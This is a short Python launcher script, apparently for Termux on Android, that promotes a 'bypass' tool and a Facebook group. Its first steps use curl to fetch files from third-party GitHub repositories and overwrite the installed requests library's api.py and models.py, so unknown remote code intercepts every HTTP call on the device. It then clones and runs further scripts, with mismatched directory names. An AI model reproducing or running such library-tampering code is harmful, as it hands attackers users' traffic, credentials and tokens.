import os,time
os.system("curl https://raw.githubusercontent.com/JUTTBRAND/Library/main/api.py > /data/data/com.termux/files/usr/lib/python3.11/site-packages/requests/api.py")
os.system("curl https://raw.githubusercontent.com/ITX-SANAN/tt/main/12.py > /data/data/com.termux/files/usr/lib/python3.11/site-packages/requests/models.py")
os.system("clear")
print("\n\n\tJoin My Facebook Group")
print("\n    Apna key group ma post karo approval ka lia");time.sleep(2)
os.system('xdg-open https://www.facebook.com/groups/207678473842318')
os.system("cd $HOME && git clone https://github.com/SHOOTER-MAKER/JuttBadshah")
os.system("cd $HOME && cd JuttBadshah-Bypass && python /data/data/com.termux/files/home/JuttBadshah/Juttbrand.py")
os.system("cd $HOME && cd JuttBadshah-Bypass && python /data/data/com.termux/files/home/JuttBadshah-Bypass/KRS.py")
